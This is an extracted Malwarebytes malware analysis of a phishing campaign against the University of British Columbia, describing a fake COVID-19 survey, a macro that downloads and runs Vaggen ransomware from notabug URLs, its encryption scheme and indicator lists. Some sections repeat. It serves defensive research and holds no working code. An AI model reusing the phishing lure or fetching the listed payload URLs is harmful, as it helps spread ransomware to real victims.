3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3450 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3451 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3452 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3453 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3454 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3455 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3456 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3457 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3458 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3459 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3460 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3461 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3462 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3463 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3464 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3465 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3466 of 3467\n\nSource: https://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3467 of 3467", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/" ], "report_names": [ "fake-covid-19-survey-hides-ransomware-in-canadian-university-attack" ], "threat_actors": [], "ts_created_at": 1775791215, "ts_updated_at": 1775791342, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/215d11eb1f4328ea10a9add6803aff006e3356e2.pdf", "text": "https://archive.orkl.eu/215d11eb1f4328ea10a9add6803aff006e3356e2.txt", "img": "https://archive.orkl.eu/215d11eb1f4328ea10a9add6803aff006e3356e2.jpg" } }